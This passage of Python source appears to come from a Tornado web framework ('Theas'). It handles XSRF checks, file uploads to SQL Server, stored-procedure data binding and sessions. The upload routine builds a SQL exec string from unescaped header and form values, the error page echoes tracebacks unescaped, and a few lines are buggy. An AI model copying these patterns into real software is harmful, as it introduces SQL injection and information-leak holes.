self.set_cookie(USER_COOKIE_NAME, self.cookie_usertoken, path='/')
def check_xsrf_cookie(self):
"""
Normally we want to allow Tornado to validate XSRF tokens as normal. However
certain special resources (such as those that must accept a form post form an
external site that does not have access to the XSRF token) may allow for XSRF
token validation to be disabled.
Since XSRF checking is performed by Torndao before the request is processed,
the caller must indicate that XRSF checking is to be skipped by providing
skipXSRF=1 (in either a query string parameter or form field). However,
if skipXSRF=1, an error will be raised later when processing the request if
the resource's skip_xsrf flag is not set. (In other words, in order for XSRF
checking to be skiped, the requestor must indicate skipXSRF=1 AND the resource
must be configured to accept SkipXSRF as well.)
"""
if self.get_argument('skipXSRF', default='0') == '1':
self.deferred_xsrf = True
# since we are skipping XSRF validation we can't trust the session cookie
self.cookie_st = None
self.cookie_usertoken = None
self.write_cookies()
ThSession.cls_log('Cookies',
'Cleared cookies {} and theas:th:UsersToken due to skipXSRF'.format(SESSION_COOKIE_NAME))
return True
else:
xsrf_ok = False
xsrf_message = ''
try:
tornado.web.RequestHandler.check_xsrf_cookie(self)
xsrf_ok = True
except Exception as e:
# Tornado normally just raises an exception, such as:
# raise HTTPError(403, "'_xsrf' argument missing from POST")
xsrf_ok = False
xsrf_message = str(e)
if not xsrf_ok:
ThSession.cls_log('xsrf', xsrf_message)
self.send_error(status_code=403, message=xsrf_message)
def write_error(self, status_code, **kwargs):
global G_program_options
buf = '<html><body>Unhandled error in ThHandler</body></html>'
try:
this_err_cls = None
this_err = ''
this_trackback = None
lines = []
if 'exc_info' in kwargs:
this_err_cls, this_err, this_trackback = kwargs['exc_info']
if not this_err and 'message' in kwargs:
this_err = kwargs['message']
if status_code == 404:
buf = '<html><body>Error 404: File not found</body></html>'
else:
if 'exc_info' in kwargs:
for line in traceback.format_exception(this_err_cls, this_err, this_trackback):
lines.append(line)
buf = '<html><body><p>Sorry, but you encountered an error at {}.</p>' \
'<p>Click <a href="{}">here</a> to log in and try again.</p>' \
'<p>{}</p><p>{}</p></body></html>'
buf = buf.format(
str(datetime.datetime.now()),
G_program_options.server_prefix + '/logout',
str(this_err),
str(lines)
)
finally:
self.write(buf)
self.finish()
if self.session is not None:
self.session.finished()
def process_uploaded_files(self):
def process_file(bindata=None, filename=None, file_obj=None, fieldname=None, filetype=None):
buf = None
if bindata is not None:
buf = '0x' + binascii.hexlify(bindata).decode('ascii')
elif file_obj is not None:
buf = '0x' + binascii.hexlify(file_obj['body']).decode('ascii')
filename = file_obj['filename']
filetype = file_obj['content_type']
# fileProc = ThStoredProc('theas.spinsHTTPFiles', self.session)
# if fileProc.is_ok:
# if bindata is not None:
# buf = '0x' + binascii.hexlify(bindata).decode('ascii')
# filename = 'body'
# else:
# buf = '0x'.encode('ascii') + binascii.hexlify(file_obj['body']).decode('ascii')
# filename = this_file['filename']
# fileProc.bind(fieldname, _mssql.SQLVARCHAR, '@FieldName')
# fileProc.bind(this_filename, _mssql.SQLVARCHAR, '@FileName')
# fileProc.bind(buf, _mssql.SQLVARCHAR, '@FileCharData')
# should work, but does not: #fileProc.bind(this_file['body'], _mssql.SQLVARBINARY, '@FileData')
# fileResultValue = fileProc.execute()
# callproc() is broken as of 6/16/2015, in that it truncates long values:
# https://github.com/pymssql/pymssql/issues/275
# So we are forced to use execute instead
sql_str = "exec theas.spinsHTTPFiles @FieldName={this_fieldname}, @FileName={this_filename}, @FileType={this_filetype}, @FileData={this_filedata}".format(
this_fieldname='\'' + fieldname + '\'' if fieldname else 'NULL',
this_filename='\'' + filename + '\'' if filename else 'NULL',
this_filetype='\'' + filetype + '\'' if filename else 'NULL',
this_filedata=buf if buf else 'NULL'
)
self.session.sql_conn.execute_non_query(sql_str)
if self.session.sql_conn is None or not self.session.sql_conn.connected:
self.session.log('POST Files', 'Process_uploaded_files(', 'New connection')
self.session.init_session()
if self.request.headers.get('Content-Type') == 'application/octet-stream':
self.session.log('POST Files', 'Delivering binary body to SQL')
process_file(bindata=self.request.body,
filename=self.request.headers.get('X-File-Name'),
filetype=self.request.headers.get('X-File-Type')
)
if len(self.request.files) > 0:
self.session.log('POST Files', 'Delivering upload files to SQL')
# pass upload files to SQL
for this_file_field in list(self.request.files.keys()):
for this_file in self.request.files[this_file_field]:
process_file(file_obj=this_file, fieldname=this_file_field)
def get_template(self, resource_code):
global G_cached_resources
global G_program_options
# Get template
template_str = None
resultset_str = None
resource = None
self.session.log('Resource', 'Fetching resource ', resource_code)
resource = G_cached_resources.get_resource(resource_code, self.session)
if resource is None:
if template_str is None:
msg = 'Could not load {} from the database. '.format(
'default template' if resource_code is None else 'template "{}"'.format(resource_code)
) + ' Probably this user is not configured to use this server.' + \
'<p>Click <a href="{}">here</a> to log in and try again.</p>'.format(
G_program_options.server_prefix + '/logout')
template_str = '<html><body>' + msg + '</body></html/>'
else:
template_str = resource.data
if resource is not None and resource.exists and resource.resource_code != LOGIN_RESOURCE_CODE and \
resource.render_jinja_template and self.session.current_resource != resource:
# We may have retrieved a cached resource. Set current_resource.
self.session.current_resource = resource
self.session.current_template_str = template_str
if template_str is None or len(template_str) == 0:
msg = 'Could not load {} from the database. '.format(
'default template' if resource_code is None else 'template "{}"'.format(resource_code)
) + ' Empty template was returned.' + \
'<p>Click <a href="{}">here</a> to log in and try again.</p>'.format(
G_program_options.server_prefix + '/logout')
template_str = '<html><body>' + msg + '</body></html>'
return template_str, resource
def get_data(self, resource, suppress_resultsets=False):
# Get actual quest data
had_error = False
self.session.comments = 'ThHandler.get_data'
# Always initialize data--even if there is no APIStoredProc to call.
# This way a Jinja template can always access data._Theas
this_data = self.session.init_template_data()
# serialize form parameters (excluding theas: parameters) to pass into the stored procedure
form_params = self.request.body_arguments
form_params_str = ''
for key in form_params:
if not key.startswith('theas:'):
this_val = form_params[key]
if isinstance(this_val, list) and len(this_val) > 0:
this_val = this_val[0]
if isinstance(this_val, bytes):
this_val = this_val.decode('utf-8')
elif this_val:
this_val = str(this_val)
form_params_str = form_params_str + key + '=' + urlparse.unquote(this_val) + '&'
# serialize theas paramters to pass into the stored procedure
theas_params_str = self.session.theas_page.serialize()
proc = None
if resource and resource.api_stored_proc:
proc = ThStoredProc(resource.api_stored_proc, self.session)
try:
if proc.is_ok:
try:
proc.refresh_parameter_list()
except:
self.session.logout()
raise
# if '@QuestGUID' in proc.parameter_list and self.session.theas_page.get_value('questGUID') is not None:
# proc.bind(self.session.theas_page.get_value('questGUID'), _mssql.SQLCHAR, '@QuestGUID')
# if '@StepGUID' in proc.parameter_list and self.session.theas_page.get_value('stepGUID') is not None:
# proc.bind(self.session.theas_page.get_value('stepGUID'), _mssql.SQLCHAR, '@StepGUID')
# if '@StepDefID' in proc.parameter_list and self.session.theas_page.get_value('stepDefID') is not None:
# proc.bind(self.session.theas_page.get_value('stepDefID'), _mssql.SQLCHAR, '@StepDefID')
first_path_elem = self.request.path.split('/')[1]
if '@Document' in proc.parameter_list:
this_document = None
if first_path_elem == 'r':
this_document = self.request.path.split('/')[2]
else:
this_document = self.request.path
if this_document is not None:
proc.bind(this_document, _mssql.SQLCHAR, '@Document')
if '@PathFull' in proc.parameter_list:
proc.bind(self.request.path, _mssql.SQLCHAR, '@PathFull')
if '@PathParams' in proc.parameter_list:
this_path = None
if first_path_elem == 'r':
this_path = "/".join(self.request.path.split('/')[3:])
if this_path is not None:
proc.bind(this_path, _mssql.SQLCHAR, '@PathParams')
if '@HTTPParams' in proc.parameter_list:
proc.bind(self.request.query, _mssql.SQLCHAR, '@HTTPParams')
if '@FormParams' in proc.parameter_list:
proc.bind(form_params_str, _mssql.SQLCHAR, '@FormParams')
# proc.bind(urlparse.urlencode(self.request.body_arguments, doseq=True), _mssql.SQLCHAR, '@FormParams')
if '@HTTPHeaders' in proc.parameter_list:
headers_str = ''
this_dict = dict(self.request.headers)
for key in this_dict:
this_val = this_dict[key]
if isinstance(this_val, list) and len(this_val) > 0:
this_val = this_val[0]
if isinstance(this_val, bytes):
this_val = this_val.decode('utf-8')
elif this_val:
this_val = str(this_val)
headers_str = headers_str + '&' + key + '=' + urlparse.quote(this_val)
proc.bind(headers_str, _mssql.SQLCHAR, '@HTTPHeaders')
if '@TheasParams' in proc.parameter_list:
# proc.bind(theas_params_str, _mssql.SQLCHAR, '@TheasParams', output=proc.parameter_list['@TheasParams']['is_output'])
# Would prefer to use output parameter, but this seems not to be supported by FreeTDS. So
# we look to the resultest(s) returned by the stored proc instead.
proc.bind(theas_params_str, _mssql.SQLCHAR, '@TheasParams')
if '@SuppressResultsets' in proc.parameter_list:
proc.bind(str(int(suppress_resultsets)), _mssql.SQLCHAR, '@SuppressResultsets')
# Execute stored procedure
proc_result = proc.execute(fetch_rows=False)
except Exception as e:
had_error = True
# err_msg = self.format_error(e)
err_msg = e.text.decode('ascii')
self.session.theas_page.set_value('theas:th:ErrorMessage', '{}'.format(urlparse.quote(err_msg)))
# if not suppress_resultsets:
if not had_error:
# The stored procedure may return one or more resultsets.
# Resultsets may return a single row--most appropariately stored in a dictionary, or may contain many rows--most
# appropriately stored in a list of dictionaries.
#
# For a single-row resultset stored in a dictionary, values can be accessed as:
# this_data['General']['MO_Number']
#
# For multi-row resultsets stored in a list of dictionaries, values can be accessed while looping through the
# list of rows (dictionaries), or for a particular row in the list, such as:
# this_data['rows'][0]['MO_Number']
#
# resultsetStr contains a string of multiple lines, such as:
# resultset1
# resultest2:Field1,Field2,Field3
#
# Each line in resultsetStr indicates a resultset. If a : is present, this indicates a delimiter to a
# list of a subset of the list of fields contained in the resultset. This is to make it easy to control
# the columns from a resultet that will be displayed, without hard-coding fields into a template.
# Since we did call APIStoredProc to get data, add data._resultsetMeta
this_data['_resultsetMeta'] = {}
redirect_to = None
history_go_back = False
perform_authenticate_existing = False
resultset_list = []
resultset_strs = resource.api_stored_proc_resultset_str.splitlines()
self.session.log('SQL', 'Expecting ' + str(len(resultset_strs)) + ' resultsets')
# resultset_str is in the form:
# MyResultsetName:{max_rows}:{column1,column2}
# {max_rows} is optional. If present, will be an integer. If equals 1, resultset will be stored in a
# simple dictionary (not in a list of dictionaries). If < 1, value is ignored. If > 1, value limits
# the number of rows stored in data passed to the the template.
# {column1,column2} is optional. If present, will be a comma-separated list of column names. This list
# will be used instead of the list of all columns returned in the resultset. (i.e. will limit the
# columns stored in the data passed to the template)
this_resultset_info = {}
for resultset_str in resultset_strs:
this_resultset_fields = resultset_str.split(':')
this_resultset_info = {}
this_resultset_info['name'] = this_resultset_fields[0]
this_resultset_info['max_rows'] = None
this_data['_session'] = self.session
this_data['_resultsetMeta'][this_resultset_fields[0]] = {}
if len(this_resultset_fields) > 1:
collist_index = 1
if this_resultset_fields[1].isnumeric():
this_resultset_info['max_rows'] = int(this_resultset_fields[1])
collist_index = 2
if len(this_resultset_fields) > collist_index:
this_data['_resultsetMeta'][this_resultset_fields[0]]['columns'] = this_resultset_fields[
collist_index].split(',')
this_resultset_info['columns'] = this_data['_resultsetMeta'][this_resultset_fields[0]][
'columns']
this_resultset_info['max_rows'] = this_resultset_info['max_rows']
resultset_list.append(this_resultset_info)
row = None
for this_resultset_info in resultset_list:
max_rows = this_resultset_info['max_rows']
if max_rows is None:
max_rows = 0
if max_rows == 1:
this_data[this_resultset_info['name']] = {}
else:
this_data[this_resultset_info['name']] = []
resultset = [row for row in self.session.sql_conn]
row_count = 0
for row in resultset:
row_count += 1
if (max_rows > 1) and (row_count > max_rows):
break
else:
if this_resultset_info['max_rows'] == 1:
this_data[this_resultset_info['name']] = row
else:
this_data[this_resultset_info['name']].append(row)
self.session.log('SQL', 'Processed {} row(s) in resultest {}'.format(
str(len(this_data[this_resultset_info['name']]))
if this_data[this_resultset_info['name']] is list else 1,
this_resultset_info['name'])
)
if this_resultset_info['name'] in ('General'): # should we also include 'general' here??
if row is not None:
if 'TheasParams' in row:
theas_params_str = row['TheasParams']
if theas_params_str:
# Incorporate any Theas control changes from SQL, so these values can be used
# when rendering the template.
self.session.theas_page.process_client_request(buf=theas_params_str, accept_any=True,
from_stored_proc=True)
if theas_params_str.find('th:LoggedIn=') >= 0:
# Stored procedure is indicating authentication status changed. Retrieve
# current session info.
perform_authenticate_existing = True
# Since Theas controls may have changed, update the copy in data._Theas
this_data['_Theas']['theasParams'] = self.session.theas_page.get_controls()
if 'ErrorMessage' in row:
if not row['ErrorMessage'] is None and row['ErrorMessage'] != '':
self.session.theas_page.set_value('theas:th:ErrorMessage', row['ErrorMessage'])
if 'Cookies' in row:
cookies_str = row['Cookies']
# Cookies returns a string like name1=value1&name2=value2...
if cookies_str:
for this_pair in cookies_str.split('&'):
this_name, this_value = this_pair.split('=')
if this_name == SESSION_COOKIE_NAME:
self.cookie_st = this_value
elif this_name == USER_COOKIE_NAME:
self.cookie_usertoken = this_value
else:
self.clear_cookie(this_name, path='/')
self.set_cookie(this_name, this_value, path='/')
self.write_cookies()
self.session.log('Cookies', 'Updating cookies as per stored procedure E')
self.cookies_changed = True
# Check to see if stored proc indicates we should redirect
if 'RedirectTo' in row:
redirect_to = row['RedirectTo']
# Check to see if stored proc indicates we should go back in history
if 'DoHistoryGoBack' in row:
if str(row['DoHistoryGoBack']) == '1':
history_go_back = True
if 'Filename' in row:
self.filename = row['Filename']
if 'HTTPHeaders' in row:
header_str = row['HTTPHeaders']
# HTTPHeaders returns a string like name1=value1&name2=value2...
if header_str:
for this_pair in header_str.split('&'):
this_name, this_value = this_pair.split('=')
self.set_header(this_name, this_value)
self.session.log('Headers', 'Updating HTTP headers as per stored procedure E')
have_next_resultset = self.session.sql_conn.nextresult()
if not have_next_resultset:
break
# stored proc may have updated Theas controls, so update the copy in data._Theas
# this_data['_Theas']['theasParams'] = self.session.theas_page.get_controls()
# One of our stored procedure resultsets indicated that authentication had been performed.
# Have the session retrieve existing authentication from the database.
if perform_authenticate_existing:
self.session.log('Auth', 'Authenticating due to resource stored proc th:LoggedIn')
self.session.authenticate(retrieve_existing=True)
self.session.comments = None
return this_data, redirect_to, history_go_back
else:
self.session.comments = None
return None, None, None
@run_on_executor
def get_data_background(self, resource, suppress_resultsets=False):
return self.get_data(resource, suppress_resultsets=suppress_resultsets)
@run_on_executor
def authenticate_user_background(self, u, pw):
return self.session.authenticate(username=u, password=pw)
@run_on_executor
def build_login_screen_background(self):
return self.session.build_login_screen()
def do_render_response(self, this_resource=None):
# Gets data and renders template. Used by GET only.
# Note that this method will be called whenever the resource indicates that there is an APIStoredProc,
# even if a Jinja template is not actually used.
buf = None
this_data = None
redirect_to = None
history_go_back = False
if this_resource is not None:
if this_resource.api_stored_proc or this_resource.render_jinja_template:
this_data, redirect_to, history_go_back = self.get_data(this_resource)
if this_resource.render_jinja_template:
# resource indicates that we should render a Jinja template
buf = self.session.theas_page.render(this_resource.data, data=this_data)
elif this_resource.api_stored_proc:
# resource does not indicate that we should render a Jinja template (but does specify an
# api stored proc) so just return the raw content retrieved by get_data
if not self.session.theas_page.get_value('theas:th:ErrorMessage') and \
'General' in this_data and \
'Content' in this_data['General']:
buf = this_data['General']['Content']
return buf, redirect_to, history_go_back
@run_on_executor
def do_render_response_background(self, this_resource=None):
return self.do_render_response(this_resource=this_resource)
# @run_on_executor
# def get_resource_background(self, resource_code, th_session, for_public_use=False, all_static_blocks=False, none_if_not_found=True, from_file=None):
# global G_cached_resources
# return G_cached_resources.get_resource(resource_code, th_session, for_public_use=for_public_use, all_static_blocks=all_static_blocks, none_if_not_found=none_if_not_found, from_file=from_file)
# Background disabled
def get_resource_background(self, resource_code, th_session, for_public_use=False, all_static_blocks=False,
none_if_not_found=True, from_file=None):
return G_cached_resources().get_resource(resource_code, th_session, for_public_use=for_public_use,
all_static_blocks=all_static_blocks,
none_if_not_found=none_if_not_found, from_file=from_file)
def do_post(self, *args, **kwargs):
handled = False
# Do everything that is needed to process an HTTP post on an authenticated session
buf = None # we return buf to the caller
redirect_to = None
history_go_back = False
this_data = None
this_page = None
next_page = None
next_page_query = None
self.session.theas_page.process_client_request(request_handler=self, accept_any=False)
self.process_uploaded_files()
# self.session.theas_page.controls['ctrlinputHelloWorld'].value = self.get_body_argument('theasParams', 'NONE')
if self.get_argument('DoHistoryGoBack', default='0') == '1':
history_go_back = True
cmd = None
if self.get_arguments('cmd'):
cmd = self.get_argument('cmd')
if not cmd and self.get_body_arguments('cmd'):
cmd = self.get_body_argument('cmd')
# this_page = self.session.theas_page.get_value('th:CurrentPage')
# if not this_page:
this_page = self.request.path.rsplit('/', 1)[1]
if '?' in this_page:
this_page = this_page[:this_page.find('?')]
# if self.session.current_resource and this_page == self.session.current_resource.resource_code:
# pass
# else:
# Browser provided a different value for current_page. Perhaps the user used the back button?
# In any case, we want to use the correct stored procedure for this request. Getting the template
# will set that from us.
template_str, this_resource = self.get_template(this_page)
if self.deferred_xsrf:
self.session.theas_page.set_value('th:PerformUpdate', '1')
if cmd is not None:
pass
buf = '<html><body>Parameter cmd provided, but not implemented.</body></html>'
else:
if self.session.theas_page.get_value('th:PerformUpdate') == '1':
# Before we can process next_page, we need to submit to process this_page post
self.session.log('Data', 'Performing update of posted data')
if self.session and self.session.current_resource:
this_data, redirect_to, history_go_back = \
self.get_data(self.session.current_resource, suppress_resultsets=True)
self.session.theas_page.set_value('th:PerformUpdate', '0')
# determine what page is being requested
next_page = self.session.theas_page.get_value('th:NextPage')
if next_page in ('None', 'default', 'index'):
next_page = DEFAULT_RESOURCE_CODE
if not next_page:
next_page = this_page
if redirect_to:
self.session.log('Nav', 'PerformUpdate stored proc sent redirect to {}'.format(redirect_to))
else:
self.session.log('Nav', 'After PerformUpdate stored proc th:NextPage={}'.format(next_page))
# Force a redirect
redirect_to = next_page
# Perform redirect after processing the post (i.e. Post-Redirect-Get PRG) pattern
# Redir will be to redirect_to if set, else will be to next_page.
# This is true even if FORCE_REDIR_AFTER_POST == False, because th:PerformUpdate == 1
if redirect_to:
pass
else:
# determine what page is being requested
next_page = self.session.theas_page.get_value('th:NextPage')
if next_page and '?' in next_page:
next_page = next_page[:next_page.find('?')]
if next_page in ('None', 'default', 'index'):
next_page = DEFAULT_RESOURCE_CODE
if not next_page:
next_page = this_page
if FORCE_REDIR_AFTER_POST:
# We want to force a redirect even if next_page == this_page because this request
# is a POST, and we only want to serve up content on a GET
redirect_to = next_page
if not redirect_to:
self.session.log('Nav', 'Before processing for POST th:NextPage={}'.format(next_page))
if not self.session.current_resource or next_page != self.session.current_template_str:
template_str, this_resource = self.get_template(next_page)
else:
this_resource = self.session.current_resource
# if not self.deferred_xsrf, then XSRF token has already been validated by Tornado
xsrf_ok = not self.deferred_xsrf
xsrf_message = ''
if not xsrf_ok:
# XSRF token has not yet been validated
if this_resource is not None and this_resource.skip_xsrf:
# resource indicates that XSRF token validation is not needed
xsrf_ok = True
else:
# resource indicates that XSRF token validation is required...so do it now
try:
tornado.web.RequestHandler.check_xsrf_cookie(self)
xsrf_ok = True
except Exception as e:
# Tornado normally just raises an exception, such as:
# raise HTTPError(403, "'_xsrf' argument missing from POST")
xsrf_ok = False
xsrf_message = str(e)
if not xsrf_ok:
ThSession.cls_log('xsrf', xsrf_message)
self.send_error(status_code=403, message=xsrf_message)
handled = True
else:
if this_resource is not None:
if this_resource.requires_authentication and not self.session.logged_in:
self.session.log('Auth', 'Resource requires auth and user not logged in')
# still not logged in: present login screen
self.session.bookmark_url = this_resource.resource_code
buf = self.session.build_login_screen()
self.session.log('Auth', 'Sending login screen')
else:
if this_resource.on_before:
this_function = getattr(TheasCustom, this_resource.on_before)
if this_function is not None:
handled = this_function(self, args, kwargs)
if not handled and not history_go_back and self.session is not None:
# render output using template and data
if this_resource and this_resource.api_stored_proc:
self.session.log('Data', 'Calling get_data')
this_data, redirect_to, history_go_back = self.get_data(this_resource)
if this_resource and this_resource.render_jinja_template and redirect_to is None and not history_go_back:
self.session.log('Render', 'Calling theas_page.render')
buf = self.session.theas_page.render(template_str, data=this_data)
self.session.log('Render', 'Done with theas_page.render')
else:
# template_str does not need to be merged with data
buf = template_str
if this_resource and this_resource.on_after:
this_function = getattr(TheasCustom, this_resource.on_after)
if this_function is not None:
handled = this_function(self, args, kwargs)
return buf, redirect_to, history_go_back, handled
@run_on_executor
def do_post_background(self, *args, **kwargs):
return self.do_post(args, kwargs)
@tornado.gen.coroutine
def wait_for_session(self, seconds_to_wait=10, write_to_cookie=True):
this_sess = None
orig_cookie_session_token = self.cookie_st
# We might have a session token in a cookie. But we might also have a session token in
# a form field, or in an HTTP header. Which one do we trust? Rationale: We'd like the
# most explicit one to be used, i.e.: query string, form field, header, cookie in that
# order.
# But in the case of an async request from a stale browser request the session token
# provided in the form field might be old, and the cookie value might be new.
# The browser really must update the session token in the form if an async response
# provides an updated cookie value.
'''
if self.get_arguments(SESSION_COOKIE_NAME):
# Look for session token in request
this_session_token = self.get_argument(SESSION_COOKIE_NAME)
if USE_SECURE_COOKIES:
this_session_token = tornado.web.decode_signed_value(COOKIE_SECRET, SESSION_COOKIE_NAME, this_session_token)
elif SESSION_HEADER_NAME in self.request.headers:
this_session_token = self.request.headers[SESSION_HEADER_NAME]
else:
# fall back to cookie
this_session_token = orig_cookie_session_token
'''
# The rudimentary partial support for session tokens via forms or headers was removed on 9/7/2018, pending
# reconsideration of the best way to handle this.
this_session_token = orig_cookie_session_token
give_up = False
failed_to_lock = False
start_waiting = time.time()
while this_sess is None and not give_up:
this_sess, failed_to_lock = ThSession.get_session(session_token=this_session_token,
handler_guid=self.handler_guid,
defer_sql=True,
comments='ThHandler.wait_for_session')
if failed_to_lock and this_sess is None:
yield tornado.gen.sleep(.500)
give_up = (time.time() - start_waiting) / 1000 > seconds_to_wait
else:
give_up = True
if this_sess:
this_sess.current_handler = self
this_sess.current_xsrf_form_html = self.xsrf_form_html()
if USE_SESSION_COOKIE and write_to_cookie:
# next_url = '/'
if orig_cookie_session_token != this_sess.session_token:
self.cookie_st = this_sess.session_token
ThSession.cls_log('Cookies',
'Updating cookie {} wait_for_session() gave different token ({} vs {})'.format(
SESSION_COOKIE_NAME, orig_cookie_session_token, this_sess.session_token))
# silently re-authenticate if needed and there is a user cookie
if not this_sess.logged_in and REMEMBER_USER_TOKEN:
# try to auto-login if there is a user cookie
if self.cookie_usertoken:
ThSession.cls_log('Sessions', 'Reauthenticating user from usertoken cookie')
this_sess.authenticate(user_token=self.cookie_usertoken)
if not this_sess.logged_in:
ThSession.cls_log('Sessions', 'FAILED to reauthenticate user from usertoken cookie')
self.cookie_usertokeon = None
ThSession.cls_log('Cookies',
'Updating cookie {} wait_for_session() could not authenticate original usertoken'.format(
USER_COOKIE_NAME))
else:
self.cookie_st = None
else:
ThSession.cls_log('Sessions', 'Failed to obtain session in wait_for_session()')
self.write_cookies()
this_sess.comments = None
return this_sess
@tornado.gen.coroutine
def head(self, *args, **kwargs):
# Partial support for HTTP HEAD requests
# Currently only supports cached public resources that are in cache
# try to find required resource
resource_code = args[0]
resource = None
if resource_code and resource_code.count('.') >= 2:
# A versioned filename, i.e. my.23.css for version #23 of my.css
# We just want to cut out the version, and return the unversioned
# filename as the resource code (i.e. my.css)
# That is, Theas will always / only serve up the most recent version
# of a resource. There is not support for serving up a particular
# historical version. The version number in the file name is merely
# for the browser's benefit, so that we can "cache bust" / have the
# browser request the latest version even if it has an old version in
# cache.
# For this reason, we don't really need to inspect the resources.
# We need only manipulate the resource_code to strip out the version
# number.
segments = resource_code.split('.')
if len(segments) >= 3 and 'ver' in segments:
ver_pos = segments.index('ver')
if ver_pos > 0:
resource_code = '.'.join(segments[:ver_pos]) + '.' + '.'.join(segments[ver_pos + 2:])
self.set_header('Server', 'Theas/01')
th_session = None
# Look up response info.
# Will not return info for dynamic requests (only static requests for SysWebResource or attachment)
response_info = self.get_response_info(resource_code, th_session, sessionless=True)
if response_info is None:
self.send_error(status_code=405)
else:
self.set_header('accept-ranges', 'bytes') # but not really...
self.set_header('Content-Type', response_info.content_type)
self.set_header('Content-Length', response_info.content_length)
self.set_header('Date', response_info.current_date)
self.set_header('Expires', response_info.content_expires)
self.set_header('Cache-Control', response_info.cache_control)
self.set_header('Last-Modified', response_info.date_updated)
self.set_header('Content-Disposition', 'inline; filename="{}"'.format(response_info.content_filename))
if response_info.etag:
self.set_header('Etag', response_info.etag)
@tornado.gen.coroutine
def post(self, *args, **kwargs):
# MAIN ENTRY POINT FOR HTTP POST REQUEST
ThSession.cls_log('POST', '*******************************')
self.session = yield self.wait_for_session()
self.session.log('POST Request', 'Received request for: {}'.format(self.request.path))
self.session.log('Authentication' 'User is logged in' if self.session.logged_in else 'User is NOT logged in')
this_finished = False
handled = False
buf = None
redirect_to = None
history_go_back = False
if self.session is not None:
# This is a post. The next page may be specified in a form field theas:th:NextPage.
if not self.session.logged_in and self.get_arguments('u') and self.get_arguments('pw'):
# The requested page is the login screen
error_message = ''
if USE_WORKER_THREADS:
success, error_message = yield self.authenticate_user_background(self.get_argument('u'),
self.get_argument('pw'))
else:
success, error_message = self.session.authenticate(username=self.get_argument('u'),
password=self.get_argument('pw'))
# if not self.session.authenticate(username=self.get_argument('u'), password=self.get_argument('pw')):
if not success:
# authentication failed, so send the login screen
self.session.theas_page.set_value('theas:th:ErrorMessage', 'Error: {}.'.format(error_message))
buf = self.session.build_login_screen()
self.write(buf)
else:
# Authentication succeeded, so continue with redirect
# self.session.theas_page.set_value('theas:th:ErrorMessage', '')
if self.session.bookmark_url:
self.session.log('Proceeding with bookmarked page', self.session.bookmark_url)
self.get_template(self.session.bookmark_url)
self.session.bookmark_url = None
else:
self.session.log('Response', 'Sending clientside redir after login page success')
self.write(self.session.clientside_redir())
if not handled:
# Handle the actual form processing here. When done, we will persist session data and redirect.
if USE_WORKER_THREADS:
buf, redirect_to, history_go_back, handled = yield self.do_post_background(args, kwargs)
else:
buf, redirect_to, history_go_back, handled = self.do_post(args, kwargs)
if not handled:
if redirect_to is not None:
if self.cookies_changed:
# must perform a client-side redirect in order to set cookies
self.session.log('Session', 'Sending client-side redirect to: ({}) after do_post()'.format(
redirect_to))
self.write(self.session.clientside_redir(redirect_to))
self.session.finished()
else:
# can send a normal redirect, since no cookies need to be written
this_finished = True
self.session.log('Session',
'Sending normal redirect to: ({}) after do_post()'.format(redirect_to))
self.session.finished()
self.redirect(redirect_to)
else:
if history_go_back and self.session is not None:
if len(self.session.history) > 0:
this_history_entry = self.session.history.pop()
self.session.theas_page.set_value('theas:th:NextPage', this_history_entry['PageName'])
self.session.log('Response', 'Sending clientside redir due to history_go_back')
this_finished = True
buf = self.session.clientside_redir()
if buf is None:
buf = '<html><body>No content to send in ThHandler.post()</body></html>'
self.write(buf)
# CORS
self.set_header('Access-Control-Allow-Origin', '*') # allow CORS from any domain
self.set_header('Access-Control-Max-Age', '0') # disable CORS preflight caching
self.session.log('Response', 'Sending response')
else:
self.write('<html><body>Error: cannot process request without a valid session</body></html>')
if not handled and not this_finished:
if self.session and self.session.locked:
self.session.finished()
self.finish()
self.session = None
@tornado.gen.coroutine
def get(self, *args, **kwargs):
##########################################################
# MAIN ENTRY POINT FOR HTTP GET REQUEST
##########################################################
global G_cached_resources
if self.session:
self.session.comments = 'ThHandler.get'
# do everything needed to process an HTTP GET request
def write_log(sess, category, *args):
if sess is not None:
sess.log(category, *args)
else:
ThSession.cls_log(category, *args)
handled = False
buf = None
redirect_to = None
history_go_back = False
# try to find required resource
resource_code = None
resource = None
request_path = None
if len(args) >= 0:
request_path = args[0]
if request_path is not None and request_path.split('/')[0] == 'r':
# Special case: an "r" as the first segment of the path, such as:
# r/resourcecode/aaa/bbb
# indicates that the second segment is to be the resource code.
# This allows URLs such as /r/img/myimg.jpg to be handled dynamically: the resource img is
# loaded, and then myimg.jpg is passed in. (Otherwise the resource would be taken to be
# img/myimg.jpg
resource_code = request_path.split('/')[1]
else:
resource_code = request_path
if resource_code and resource_code.count('.') >= 2:
# A versioned filename, i.e. my.23.css for version #23 of my.css
# We just want to cut out the version, and return the unversioned
# filename as the resource code (i.e. my.css)
# That is, Theas will always / only serve up the most recent version
# of a resource. There is not support for serving up a particular
# historical version. The version number in the file name is merely
# for the browser's benefit, so that we can "cache bust" / have the
# browser request the latest version even if it has an old version in
# cache.
# For this reason, we don't really need to inspect the resources.
# We need only manipulate the resource_code to strip out the version
# number.
segments = resource_code.split('.')
if len(segments) >= 3 and 'ver' in segments:
ver_pos = segments.index('ver')
if ver_pos > 0:
resource_code = '.'.join(segments[:ver_pos]) + '.' + '.'.join(segments[ver_pos + 2:])
# note: self.session is probably not yet assigned
# A request for a cached public resource does not need a database connection.
# We can serve up such requests without even checking the session.
# If we do not check the session, multiple simultaneous requests can be processed,
if resource_code or self.session:
resource = G_cached_resources.get_resource(resource_code, self.session, none_if_not_found=True)
# see if the resource is public (so that we can serve up without a session)
if resource is not None and resource.exists and resource.is_public and \
not resource.render_jinja_template and \
not resource.on_before and not resource.on_after:
# note: resource.data will usually be str but might be bytes
ThSession.cls_log('CachedGET', 'Serving up cached resource', resource_code)
buf = resource.data
else:
# Retrieve or create a session. We want everyone to have a session (even if they are not authenticated)
# We need to use the session's SQL connection to retrieve the resource
ThSession.cls_log('GET', '*******************************')
ThSession.cls_log('GET', args[0])
self.session = yield self.wait_for_session()
if self.session is None:
ThSession.cls_log('GET Error', 'No session. Cannot continue to process request.')
self.write('<html><body>Error: cannot process request without a valid session</body></html>')
else:
# we have a session, but are not necessarily logged in
self.session.log('GET', 'Have session')
self.session.log('GET', 'Received request for: {}'.format(self.request.path))
self.session.log('Auth' 'User is logged in' if self.session.logged_in else 'User is NOT logged in')
# Take logged-in userss back to where they were
if not resource_code and self.session.logged_in:
resource = self.session.current_resource
if not resource_code and DEFAULT_RESOURCE_CODE and not self.session.logged_in:
# resource_code was not provided and user is not logged in: use default resource
# If the user is logged in, we want get_resource to select the appropriate
# resource for the user.
